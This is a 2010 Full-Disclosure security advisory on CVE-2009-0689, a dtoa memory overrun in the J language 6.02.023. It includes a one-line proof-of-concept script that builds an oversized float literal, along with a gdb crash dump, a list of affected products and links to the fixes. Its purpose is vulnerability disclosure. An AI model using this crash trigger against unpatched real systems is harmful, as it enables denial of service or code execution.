[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4B4679E5.3070002@securityreason.com>
Date: Fri, 08 Jan 2010 01:18:45 +0100
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: J 6.02.023 Array Overrun (code execution)
[ J 6.02.023 Array Overrun (code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- J 6.02.023 Array Overrun (code execution)
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/79
--- 0.Description ---
The J programming language, developed in the early 1990s by Ken Iverson
and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL
function-level languages created by John Backus.
To avoid repeating the APL special character problem, J requires only
the basic ASCII character set, resorting to the use of digraphs formed
using the dot or colon characters to extend the meaning of the basic
characters available. Additionally, to keep parsing and the language
simple, and to compensate for the lack of character variation in ASCII,
J treats many characters which might need to be balanced in other
languages (such as [] {} "" `` or <>) as stand alone tokens or (with
digraphs) treats them as part of a multi-character token.
Being an array programming language, J is very terse and powerful, and
is most suited to mathematical and statistical programming, especially
when performing operations on matrices. J is a MIMD language.
--- 1. J 6.02.023 Array Overrun (code execution) ---
The main problem exist in dtoa implementation. J has the same dtoa as
MatLab, OpenBSD, MacOS, Google, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.
--- 2. Proof of Concept (PoC) ---
There are several ways to make a successful attack. Simplest assumed the
creation of a script with a defective floating-point variable and
execution it. This will allow the possibility of code execution.
-expl.ijs----------------------
cxib=0.<?php echo str_repeat("1",296450); ?>
-expl.ijs----------------------
Program received signal SIGSEGV, Segmentation fault.
0x00452157 in ?? ()
eax 0x4c2000 4988928
ecx 0x2c667c 2909820
edx 0x46d054 4640852
ebx 0x48a607 296455
esp 0x98f720 0x98f720
ebp 0x98f77c 0x98f77c
esi 0x4363808 70662152
edi 0x0 0
eip 0x452157 0x452157
eflags 0x10206 [ PF IF RF ]
cs 0x1b 27
ss 0x23 35
ds 0x23 35
es 0x23 35
fs 0x3b 59
gs 0x0 0
edi=0
(gdb) x/i $eip
0x452157: test %eax,(%eax)
(gdb) x/x $eax
0x4c2000: 0x00000000
--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J
This list is not yet closed.
--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.
--- 6. Greets ---
Infospec p_e_a pi3
--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com
GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg
http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
Download attachment "signature.asc" of type "application/pgp-signature" (164 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists